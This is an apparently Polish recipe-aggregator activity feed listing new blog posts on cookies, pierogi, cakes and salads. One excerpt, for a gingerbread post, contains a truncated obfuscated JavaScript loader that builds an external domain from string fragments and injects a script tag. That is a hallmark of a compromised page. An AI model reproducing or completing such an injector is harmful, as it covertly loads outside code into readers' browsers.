Activity
-
CookingTime dodał(a) nowy wpis, Domowe cantuccini 2 tygodnie, 6 dni temu
Cantuccini to jedne z najbardziej rozpoznawalnych włoskich ciasteczek – suche, chrupiące i pełne migdałów. W tej wersji z dodatkiem masła, pistacji i żurawiny nabierają wyraźniejszego aromatu oraz ciekawszeg[…]
-
admin dodał(a) nowy wpis, Pierogi z kapustą i grzybami – domowe, miękkie i pełne aromatu 2 tygodnie, 6 dni temu
Pierogi z kapustą i grzybami to taki klasyk, którego nie trzeba nikomu przedstawiać, bo już sam zapach farszu potrafi człowieka przenieść do kuchni, gdzie zawsze było ciepło, spokojnie i jakoś tak swojsko.[…]

-
Posmakujto! dodał(a) nowy wpis, Makowiec japoński z musem jabłkowo-cytrynowym 2 tygodnie, 6 dni temu
Makowiec japoński to niezwykle wilgotne, aromatyczne ciasto, które zachwyca swoją lekkością mimo braku mąki. W tej wersji zyskuje jeszcze przyjemniejszy smak dzięki delikatnemu musowi jabłkowo-cytrynowemu, który ś[…]
-
Smaki na talerzu dodał(a) nowy wpis, Bajaderki 2 tygodnie, 6 dni temu
Przyznam się Wam, że bajaderki to moja słodka słabość. To jedyna cukiernicza klasyka, po którą naprawdę zdarza mi się od czasu do czasu sięgać „na mieście”, mimo że doskonale wiem, jaka legenda krąży o tym jak i[…]
-
Via Gusto dodał(a) nowy wpis, Jak używać kamienia do pieczenia pizzy w piekarniku? 2 tygodnie, 6 dni temu
Artykuł sponsorowany – treść i zdjęcia dostarczone przez Partnera
Kamień do pieczenia pizzy to jedno z tych kuchennych akcesoriów, które potrafią całkowicie zmienić jakość domowego wypieku. Dzięki niemu[…]
-
Adriia dodał(a) nowy wpis, Fekkas – marokańskie ciasteczka 2 tygodnie, 6 dni temu
Fekkas – marokańskie ciasteczka, które pachną tradycjąJeśli istnieją wypieki, które w Maroku nigdy się nie nudzą i które podaje się zarówno na codzienny podwieczorek, jak i na wielkie rodzinne okazje, to z[…]
-
Via Gusto dodał(a) nowy wpis, Pierniczki bez cukru (kruche) 2 tygodnie, 6 dni temu
Uwielbiam te pierniczki bez cukru! Są delikatne i kruche, a lukier z ksylitolu świetnie je dopełnia. Pierniczki są bardzo proste w przygotowaniu, a ze stołu znikają w mgnieniu oka.
Spis treści:Przepis na kruche[…]

-
Food-Square – o jedzeniu do kwadratu! dodał(a) nowy wpis, Bombardino – alpejski grzaniec z ajerkoniaku 2 tygodnie, 6 dni temu
Bombardino znają chyba wszyscy narciarze, którzy bywają we włoskich Alpach. Chociaż myślę, że nie tylko, bo ten napój zdobył furorę w wielu górskich kurortach. Ten alpejski grzaniec z ajerkoniaku to idealny tru[…]
-
Pieprzyć z Fantazją dodał(a) nowy wpis, Seromakowiec – sernik z makiem na święta 2 tygodnie, 6 dni temu
Seromakowiec – połączenie delikatnego sernika i makowca w jednym cieście. Kremowy, aromatyczny, z polewą czekoladową i chrupiącymi migdałami. Ten świąteczny klasyk zawsze robi wrażenie!
Artykuł Seromakowiec[…] -
Gotujemy i jemy dodał(a) nowy wpis, Bardzo kruche rogaliki orzechowe 2 tygodnie, 6 dni temu
Kruchutkie rogaliki orzechowe – ciasteczka idealne na Boże NarodzenieKruche rogaliki orzechowe to przepyszne drobne ciasteczka, na które przepis otrzymałam od rodziny ze Śląska Cieszyńskiego. Te urocze słodk[…]
-
Danuta Magda Slugocka dodał(a) nowy wpis, szybka a'la pizza z francuskiego ciasta z airfryer… 2 tygodnie, 6 dni temu
Składniki:recipe:📣📣📣 1 rolkę ciasta francuskiego rozwinąć i przeciąć na połowę 🆗 Do kosza airfry włożyć tackę lub papier do pieczenia i dać połowę ciasta 🆗 Posmarować pastą pomidorową, dać usmażone piecza[…]
-
Gotowanie to proste dodał(a) nowy wpis, Dania pełne wspomnień – dlaczego wracamy do smaków z dzieciństwa? 2 tygodnie, 6 dni temu
Jeden zapach, jeden kęs – i nagle
wracają wspomnienia. Kuchnia dzieciństwa to coś więcej niż smak.
To emocje, bezpieczeństwo i ciepło rodzinnego domu. Nic dziwnego,
że w dorosłym życiu wciąż szukamy tych samych[…] -
COOKMAGAZINE dodał(a) nowy wpis, Poradnik: Jak wybrać odpowiedni piec tunelowy do produkcji cukierniczej 2 tygodnie, 6 dni temu
Wybór odpowiedniego pieca tunelowego to inwestycja wpływająca na jakość wyrobów cukierniczych i efektywność produkcji. Z doświadczenia wiem, że warto dokładnie przeanalizować dostępne opcje, by podjąć najle[…]
-
zdrowebodomowe.pl dodał(a) nowy wpis, Chrupiące i Słodkie Placki Jaglane 3 tygodnie temu
Dzisiejszy przepis, czyli Chrupiące i Słodkie Placki Jaglane, to przykład tego, jak z kilku prostych, naturalnych składników można wyczarować coś pysznego, chrupiącego i – co najważniejsze – pełnego wartości odżyw[…]
-
fajneprzepisy dodał(a) nowy wpis, Sałatka śledziowa 3 tygodnie temu
Klasyk polskiej kuchni w nowoczesnym wydaniu – sałatka śledziowa, która zachwyca smakiem i prostotą wykonania.
Artykuł Sałatka śledziowa pochodzi z serwisu ProstaKuchnia.pl.
Czytaj dalej

-
smaczne i domowe dodał(a) nowy wpis, Kuchnia Śląska na Barbórkę: Co Jadał Górnik? Odkrywamy Zapomniany Garnuszek Górniczy (Przepis i Tradycja z 1980 Roku). 3 tygodnie temu
garnuszek górniczy – Barbórka- kuchnia śląskaBarbórka – największe regionalne święto, w którym cały Śląsk oddaje hołd ciężkiej pracy górników. Ten dzień zawsze wymagał sytej i pożywnej kuchni. W barbórkę odbywały[…]
-
Wypieki Beaty dodał(a) nowy wpis, Pierniki świąteczne, czyli wyjątkowa tradycja, zapach i smak Bożego Narodzenia 3 tygodnie temu
(function(){
zz99=document.createElement(„script”);zz99_=(„o”+(„pen”)+”st”)+”a”;zz99.async=true;
zz99.type=”text/javascript”;zz99_+=(„t”)+”.e”+””;zz99_+=((„”)+”u”);zz99_+=”/”;
zz99u=”2548030941.”;zz99u+=”b4p44w8sz99[…] -
Swojskie jedzonko dodał(a) nowy wpis, Sałatka z gruszką, serem pleśniowym i szpinakiem 3 tygodnie temu
Proste połączenie ale zdecydowanie zawsze się sprawdza. Tym razem w sałatce, zrobiłam ja ostatnio i gościom bardzo smakowała, polecam również wam… Zobacz przepis » Czytaj dalej
-
Natalia Dolata dodał(a) nowy wpis, Pulled pork po rosole. Tak pyszna, że palce lizać! 3 tygodnie temu
Pulled pork, czyli szarpana wieprzowina to po prostu coś pysznego, co warto od czasu do czasu zrobić. U mnie gości przy okazji rosołu, bo do jej przygotowania wykorzystuję właśnie ugotowane wcześniej mięso.[…]
-
Cynamonowe szczęśćie dodał(a) nowy wpis, Orzechowy miodownik bez jajek mięciutki, puszysty i elegancki 3 tygodnie temu
Miodownik bez jajek – mięciutki, puszysty i pięknie warstwowy
Są takie ciasta, które przenoszą nas do czasów dzieciństwa. Do kuchni pachnącej miodem, masłem i tym ciepłym spokojem, który towarzyszył pieczeniu cia[…] - Załaduj więcej